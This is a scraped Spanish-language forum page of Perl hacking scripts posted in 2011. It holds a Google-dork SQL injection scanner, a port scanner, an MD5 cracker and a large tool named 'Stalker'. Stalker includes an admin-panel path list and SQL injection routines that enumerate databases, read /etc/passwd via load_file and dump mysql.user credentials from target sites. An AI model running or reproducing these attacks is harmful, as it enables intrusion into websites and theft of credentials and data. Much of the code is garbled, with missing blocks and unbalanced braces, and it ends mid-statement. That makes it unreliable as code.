"[+] OS Version : ".Win32 ::GetOSName()."\n"; print "[+] Username : ".Win32 ::LoginName()."\n\n\n"; } sub infolinux { print "[+] System information\n\n"; } #The End
|
|
|
387
|
Programación / Scripting / [Perl] Search in google for scan SQLI
|
en: 7 Octubre 2011, 15:57 pm
|
Un simple scanner de SQLI para usar en google #!usr/bin/perl #Search Google for scan SQLI #(C) Doddy Hackman 2011 use LWP::UserAgent; use HTML::LinkExtor; my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); chomp(my $dork = <stdin>); chomp(my $pages = <stdin>); print "\n\n[Starting the search]\n\n"; my @links = google($dork,$pages); print "\n[Links Found] : ".int(@links)."\n\n\n"; print "[Starting the scan]\n\n\n"; for my $link(@links) { if ($link=~/(.*)=/ig) { my $web = $1; sql($web."="); }} print "\n\n[+] Finish\n"; copyright(); <stdin>; sub google { my($a,$b) = @_; for ($pages=10;$pages<=$b;$pages=$pages+10) { $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages"); my @links = get_links($code); for my $l(@links) { if ($l =~/webcache.googleusercontent.com/) { } } } for(@url) { if ($_ =~/cache:(.*?):(.*?)\+/) { } } my @founds = repes(@founds); } sub sql { my ($pass1,$pass2) = ("+","--"); $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "[+] SQLI : $page\a\n"; }} sub get_links { $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]); sub agarrar { my ($a,%b) = @_; } } sub repes { foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } } sub head { print "\n\n-- == Search Google == --\n\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; } sub toma { return $nave->get($_[0])->content; } sub tomar { my ($web,$var) = @_; return $nave->post($web,[%{$var}])->content; } #Thanks to explorer (PerlEnEspañol) # ¿ The End ?
|
|
|
388
|
Programación / Scripting / [Perl] Scan Port By Doddy H
|
en: 7 Octubre 2011, 15:56 pm
|
HOla a todos aca les traigo un simple scanner de puertos hecho en perl #!usr/bin/perl #Scan Port #(C) Doddy Hackman 2011 #Creditos use IO::Socket; head(); unless($ARGV[0]) { print "\n\n[sintax] : ".$0." <ip> \n\n"; } else { scan($ARGV[0]); } copyright(); sub scan { my %ports = ("21"=>"ftp", "22"=>"ssh", "25"=>"smtp", "80"=>"http", "110"=>"pop3", "3306"=>"mysql" ); print "\n[+] Scanning $_[0]\n\n\n"; for my $port(keys %ports) { if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) { print "[Port] : ".$port." [Service] : ".$ports{$port}."\n"; } } } sub head { print "\n\n-- == Scan Port == --\n\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; }
Ejemplo de uso
|
|
|
389
|
Programación / Scripting / [Perl] Search MD5
|
en: 7 Octubre 2011, 15:56 pm
|
Hola a todos HOy acabo de hacer un crackeador de hash md5 con salto o sin el En esta version es con ventanas usandos tk #Search MD5 #Version : Tk #Author : Doddy Hackman use Tk; use Digest::MD5; use Tk::FileSelect; use Tk::ROText; if ($^O eq 'MSWin32') { use Win32::Console; Win32::Console::Free(); } my $w = MainWindow->new(-background=>"black"); $w->title("Search MD5"); $w->geometry("500x200+20+20"); $w->resizable(0,0); $w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack(); $w->Label(-text =>"Hash",-background =>"black",-foreground =>"green")->place(-x =>40, -y => 55); my $hash = $w->Entry(-text =>"30d554c3665c8f204622b2003c77d994",-background =>"black",-foreground =>"green")->place(-x =>90, -y => 55); $w->Label(-text =>"Salt",-background =>"black",-foreground =>"green")->place(-x =>260, -y => 55); my $salt = $w->Entry(-text =>"X",-background =>"black",-foreground =>"green")->place(-x =>290, -y => 55); $w->Label(-text =>"Wordlist",-background =>"black",-foreground =>"green")->place(-x =>40, -y => 100); my $o = $w->Entry(-textvariable =>\$file,-background =>"black",-foreground =>"green")->place(-x =>90, -y => 100); $w->Button(-text =>"Browse",-background =>"black",-foreground =>"red",-activebackground =>"red",-command =>\&oper)->place(-x =>230, -y => 100); $w->Button(-text =>"Crack!",-foreground =>"green",-background =>"black",-command =>\&crack,-activebackground =>"green")->place(-x =>180, -y => 160); $w->Button(-text =>"About",-foreground =>"green",-background =>"black",-command =>\&about,-activebackground =>"green")->place(-x =>240, -y => 160); $w->Button(-text =>"Exit",-foreground =>"green",-background =>"black",-command =>[$w =>'destroy'],-activebackground =>"green")->place(-x =>300, -y => 160); sub oper{ $w->update; $browse = $w->FileSelect(-directory => "/"); my $file = $browse->Show; $o->configure (-text =>$file); } sub about { my $venta = MainWindow->new(-background=>"black"); $venta->geometry("300x180+20+20"); $venta->title("About"); $venta->resizable(0,0); $venta->Label(-text=>"\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",-background=>"black",-foreground=>"yellow")->pack(); $venta->Button(-text=>"Exit",-foreground=>"yellow",-background=>"black",-command => [$venta => 'destroy'],-activebackground=>'yellow')->pack() } sub crack { my $hash = $hash->get; my $salt = $salt->get; my $wordlist = $o->get; my $console = MainWindow->new(-background=>"black"); $console->title("Status"); $console->resizable(0,0); $console->geometry("400x320+20+20"); $console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack(); my $box = $console->ROText(-background =>"black",-foreground =>"green",-width => 45,-height => 15)->place(-x =>40,-y=>50); $console->Button(-text =>"Exit",-background =>"black",-foreground =>"green",-activebackground =>"green",-command => [$console => 'destroy'],-width =>"20")->place(-x =>130, -y => 280); if ($salt eq "X") { $salt = "";} unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");next;} $box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n"); @words = <word>; for my $pass(@words) { $console->update; $box->insert('end',"[+] Trying with $pass\n"); $digest = Digest::MD5->md5_hex($pass.$salt);chomp $digest; if ($digest == $hash) {print "\a\a";$box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");$ok="1";last ;} }} else { $box->insert('end',"\n\n[-] The hash is incorrect\n\n");next;} unless ($ok eq "1") {$box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n");next;}} MainLoop;
|
|
|
390
|
Programación / Scripting / [Perl] Stalker By Doddy H
|
en: 7 Octubre 2011, 15:56 pm
|
Bueno aca les traigo un programa que eh estado haciendo esta ultima semana Se llama stalker , sirve como consola en caso de que cmd.exe no este disponible y tiene las siguiente funciones - Mostrar IP de servidor especifico
- Capturar todos los links de una pagina
- Recibir procesos de nuestra maquina
- Cerrar el proceso que nos moleste
- Conectar a un servidor y mostrar respuesta
- Capturar metodos HTTP de un servidor web
- Verificar listado de directorios en una pagina
- Codificacion y decodificacion de hex/ascii/base64
- Escanear puertos de una IP
- Buscar panel de administracion
- Crackear hash md5 mediante webs
- Buscar en google paginas vulnerables a SQLI
- Cliente FTP
- Navegador por nuestros archivos y directorios
- Y ejecutar comandos
#!usr/bin/perl #Project STALKER (C) Doddy Hackman 2011 # #ppm install http://www.bribes.org/perl/ppm/DBI.ppd #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd # #You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm # use IO::Socket; use HTML::LinkExtor; use LWP::UserAgent; use Win32::Process; use Net::FTP; use Cwd; use URI ::Split qw(uri_split ); use MIME::Base64; use DBI; use Color::Output; Color::Output::Init @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx' ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx' ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx' ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx' ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx' ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx' ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp' ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx' ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php' ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php' ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php' ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php' ,'administration/','administration/index.php','administration/login.php' ,'administrator/index.php','administrator/login.php','administrator/system.php','system/' ,'system/login.php','admin.php','login.php','administrador.php','administration.php' ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php' ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html' ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html' ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html' ,'administrator/','administrator/index.html','administrator/login.html' ,'administrator/account.html','administrator/account.php','administrator.html','login.html' ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php' ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/' ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html' ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp' ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp' ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp' ,'administrator/login.asp','administrator/account.asp','administrator.asp' ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp' ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/' ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php' ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp' ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html' ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html' ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp' ,'webadmin.html','administratie/','admins/','admins.php','admins.asp' ,'admins.html','administrivia/','Database_Administration/','WebAdmin/' ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/' ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/' ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/' ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/ ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/ ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/ ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/ ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/' ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/' ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/' ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/' ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/' ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/' ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/' ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/' ,'server/','database_administration/','power_user/','system_administration/' ,'ss_vms_admin_sm/'); unless (-d "/logs/webs") { } my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); getinfo(); $SIG{INT} = \&next; while(1) { cprint "\x037"; #13 menujo(); cprint "\x030"; } sub getinfo { $so = $^O; $login = Win32::LoginName(); $domain = Win32::DomainName(); cprint "\x0313"; #13 print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n"; cprint "\x030"; } sub menujo { chomp (my $cmd = <stdin>); if ($cmd=~/getinfo/ig) { getinfo(); } elsif ($cmd =~/getip (.*)/) { my $te = $1; if ($te eq "" or $te eq " ") { print "\n[+] sintax : getip <host>\n"; } print "\n[IP] : ".getip ($1)."\n"; } elsif ($cmd =~/getlink (.*)/) { print "[+] Extracting links in the page\n\n\n"; $code = toma($1); my @re = get_links($code); for my $url(@re) { } print "\n\n[+] Finish\n"; } elsif ($cmd=~/help/) { helpme(); } elsif ($cmd=~/getprocess/) { my %re = getprocess(); ($proceso,$pid) = ($t=~/(.*):(.*)/ig); print "[+] Proceso : ".$data."\n"; print "[+] PID : ".$re{$data}."\n\n"; } } elsif ($cmd=~/killprocess (.*) (.*)/) { if (killprocess($1,$2)) { print "[+] Process $1 closed"; } } elsif ($cmd=~/conec (.*) (.*) (.*)/) { print conectar ($1,$2,$3); } elsif ($cmd=~/allow (.*)/) { $re = conectar($1,"80","GET / HTTP/1.0\r\n"); if ($re=~/Allow:(.*)/ig) { print "[+] Metodos : ".$1."\n"; }} elsif ($cmd=~/paths (.*)/) { scanpaths($1); } elsif ($cmd=~/encodehex (.*)/) { print "\n\n[+] ".hex_en ($1)."\n\n"; } elsif ($cmd=~/decodehex (.*)/) { print "\n\n[+] ".hex_de ($1)."\n\n"; } elsif ($cmd=~/download (.*) (.*)/) { my $file,$name = $1,$2; if (download($1,$2)) { print "[+] File downloaded\n"; } } elsif ($cmd=~/encodeascii (.*)/) { print "\n\n[+] ".ascii ($1)."\n\n"; } elsif ($cmd=~/decodeascii (.*)/) { print "\n\n[+] ".ascii_de ($1)."\n\n"; } elsif ($cmd=~/encodebase (.*)/) { print "\n\n[+] ".base ($1)."\n\n"; } elsif ($cmd=~/decodebase (.*)/) { print "\n\n[+] ".base_de ($1)."\n\n"; } elsif ($cmd=~/aboutme/) { aboutme(); } elsif ($cmd=~/scanport (.*)/) { scanport($1); } elsif ($cmd=~/panel (.*)/) { scanpanel($1); } elsif ($cmd=~/scangoogle/) { chomp(my $dork = <stdin>); chomp(my $pages = <stdin>); print "\n\n[Starting the search]\n\n"; my @links = google($dork,$pages); print "\n[Links Found] : ".int(@links)."\n\n\n"; print "[Starting the scan]\n\n\n"; for my $link(@links) { if ($link=~/(.*)=/ig) { my $web = $1; sql($web."="); }} print "\n\n[+] Finish\n"; } elsif ($cmd=~/getpass (.*)/) { crackit($1); } elsif ($cmd=~/ftp (.*) (.*) (.*)/) { ftp($1,$2,$3); } elsif ($cmd=~/navegator/) { nave: chomp(my $rta = <stdin>); if ($rta=~/list/) { my @files = coleccionar(getcwd()); for(@files) { if (-f $_) { print "[File] : ".$_."\n"; } else { print "[Directory] : ".$_."\n"; }}} if ($rta=~/cd (.*)/) { my $dir = $1; print "\n[+] Directory changed\n"; } else { }} if ($rta=~/del (.*)/) { my $file = getcwd()."/".$1; if (-f $file) { print "\n[+] File Deleted\n"; } else { } } else { print "\n[+] Directory Deleted\n"; } else { }}} if ($rta=~/rename (.*) (.*)/) { if (rename(getcwd ()."/".$1,getcwd ()."/".$2)) { print "\n[+] File Changed\n"; } else { }} my $file = $1; #system(getcwd()."/".$file); } if ($rta=~/help/) { print "\nCommands : help cd list del rename open exit\n\n"; } next; } } elsif ($cmd=~/kobra (.*)/) { my $url = $1; scansqli($url,"--"); } elsif ($cmd=~/mysql (.*) (.*) (.*)/) { enter($1,$2,$3); } copyright(); <stdin>; } else { } #print "\n\n"; } sub scansqli { print "[Status] : Scanning.....\n"; $pass = &bypass($_[1]); my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($_[0]=~/hackman/ig) { savefile($save.".txt","\n[Target Confirmed] : $_[0]\n"); &menu_options($_[0],$pass,$save); } my ($gen,$save,$control) = &length($_[0],$_[1]); if ($control eq 1) { print "[Status] : Enjoy the menu\n\n"; &menu_options($gen,$pass,$save); } else { print "[Status] : Length columns not found\n\n"; menujo(); } } my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2; $code = toma($inyection); if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) { my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2); my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2); unless ($testar1 eq $testar2) { my $patha = $1; $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..200) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { @number = $test =~m{RATSXPDOWN (\d+)RATSXPDOWN }g ; $control = 1; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; savefile($save.".txt","\n[Target confirmed] : $page"); savefile($save.".txt","[Bypass] : $_[1]\n"); savefile($save.".txt","[Limit] : The site has $rows columns"); savefile($save.".txt","[Data] : The number @number print data"); if ($patha) { savefile($save.".txt","[Full Path Discloure] : $patha"); } $total=~s/$number[0]/hackman /; savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total); return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); }}}}} sub details { my ($page,$bypass,$save) = @_; ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","\n"); if ($page=~/(.*)hackman(.*)/ig) { print "\n\n[+] Searching information..\n\n"; my ($start,$end) = ($1,$2); $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2; $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2; $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ($test2=~/ERTOR854/ig) { savefile($save.".txt","[mysql.user] : ON"); print "[mysql.user] : ON\n"; } else { print "[mysql.user] : OFF\n"; savefile($save.".txt","[mysql.user] : OFF"); } if ($test1=~/ERTOR854/ig) { print "[information_schema.tables] : ON\n"; savefile($save.".txt","[information_schema.tables] : ON"); } else { print "[information_schema.tables] : OFF\n"; savefile($save.".txt","[information_schema.tables] : OFF"); } if ($test3=~/ERTOR854/ig) { print "[+] load_file permite ver los archivos\n"; savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass2; $code = toma($injection); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n"; savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"); } else { print "\n[-] Not found any data\n"; }}} sub menu_options { my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; print "\n/logs/webs/$save>"; chomp (my $rta = <stdin>); if ($rta=~/help/) { commands : details tables columns dbs othertable othercolumn mysqluser dumper logs exit ); } if ($rta =~/tables/) { schematables($_[0],$_[1],$save); &reload; } elsif ($rta =~/columns (.*)/) { my $tabla = $1; schemacolumns($_[0],$_[1],$save,$tabla); &reload; } elsif ($rta =~/dbs/) { &schemadb($_[0],$_[1],$save); &reload; } elsif ($rta =~/othertable (.*)/) { my $data = $1; &schematablesdb($_[0],$_[1],$data,$save); &reload; } elsif ($rta =~/othercolumn (.*) (.*)/){ my ($db,$table) = ($1,$2); &schemacolumnsdb($_[0],$_[1],$db,$table,$save); &reload; } elsif ($rta =~/mysqluser/) { &mysqluser($_[0],$_[1],$save); &reload; } elsif ($rta=~/logs/) { $t = "logs/webs/$save.txt"; &reload; } next; } elsif ($rta=~/dumper (.*) (.*) (.*)/) { my ($tabla,$col1,$col2) = ($1,$2,$3); &dump($_[0],$col1,$col2,$tabla,$_[1],$save); &reload; } elsif ($rta =~/details/) { &details($_[0],$_[1],$save); &reload; } else { &reload; } } sub schematables { $real = "1"; my ($page,$bypass,$save) = @_; savefile($save.".txt","\n"); my $page1 = $page; ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","[DB] : default"); print "\n[+] Searching tables with schema\n\n"; $page =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),table_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $resto = $1; $total = $resto - 17; print "[+] Tables Length : $total\n\n"; savefile($save.".txt","[+] Searching tables with schema\n"); savefile($save.".txt","[+] Tables Length : $total\n"); my $limit = $1; for my $limit(17..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; print "[Table $real Found : $table ]\n"; savefile($save.".txt","[Table $real Found : $table ]"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; } } sub reload { &menu_options($_[0]); } sub schemacolumns { my ($page,$bypass,$save,$table) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); print "\n[DB] : default\n"; savefile($save.".txt","[DB] : default"); savefile($save.".txt","[Table] : $table\n"); $page3=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns Length : $1 ]\n\n"; savefile($save.".txt","[Columns Length : $1 ]\n"); my $si = $1; $page4=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),column_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemadb { my ($page,$bypass,$save) = @_; my $page1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Searching DBS\n\n"; ($pass1,$pass2) = &bypass($bypass); $page=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page.$pass1."from".$pass1."information_schema.schemata"); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $limita = $1; print "[+] Databases Length : $limita\n\n"; savefile($save.".txt","[+] Databases Length : $limita\n"); $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),schema_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit(0..$limita) { $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $control = $1; if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") { print "[Database $real Found] $control\n"; savefile($save.".txt","[Database $real Found] : $control"); $real++; } } } } else { print "[-] information_schema = ERROR\n"; } } sub schematablesdb { my $page = $_[0]; my $db = $_[2]; my $page1 = $page; savefile($_[3].".txt","\n"); print "\n\n[+] Searching tables with DB $db\n\n"; ($pass1,$pass2) = &bypass($_[1]); savefile($_[3].".txt","[DB] : $db"); $page =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),table_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n"; if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[+] Tables Length : $1\n\n"; savefile($_[3].".txt","[+] Tables Length : $1\n"); my $limit = $1; $real = "1"; for my $lim(0..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n"; if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; savefile($_[3].".txt","[Table $real Found : $table ]"); print "[Table $real Found : $table ]\n"; $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemacolumnsdb { my ($page,$bypass,$db,$table,$save) = @_; my $page3 = $page; my $page4 = $page; print "\n\n[+] Searching columns in table $table with DB $db\n\n"; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","\n[DB] : $db"); savefile($save.".txt","[Table] : $table"); $page3=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns length : $1 ]\n\n"; savefile($save.".txt","[Columns length : $1 ]\n"); my $si = $1; $page4=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),column_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; } } } else { print "\n[-] information_schema = ERROR\n"; } } sub mysqluser { my ($page,$bypass,$save) = @_; my $cop = $page; my $cop1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Finding mysql.users\n"; ($pass1,$pass2) = &bypass($bypass); $page =~s/hackman /concat (char (82,65,84,83,88,80,68,79,87,78,49))/; $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2); if ($code=~/RATSXPDOWN/ig){ $cop1 =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2); if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[+] Users Found : $1\n\n"; savefile($save.".txt","\n[+] Users mysql Found : $1\n"); for my $limit(0..$1) { $cop =~s/hackman /unhex (hex(concat (0x524154535850444f574e ,Host ,0x524154535850444f574e ,User ,0x524154535850444f574e ,Password ,0x524154535850444f574e )))/; $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) { print "[Host] : $1 [User] : $2 [Password] : $3\n"; savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3"); } else { &reload; } } } } else { print "\n[-] mysql.user = ERROR\n\n"; } } savefile($_[5].".txt","\n"); my $page = $_[0]; ($pass1,$pass2) = &bypass($_[4]); if ($page=~/(.*)hackman(.*)/){ my $start = $1; my $end = $2; print "\n\n[+] Extracting values...\n\n"; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))"; $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2); $concat = 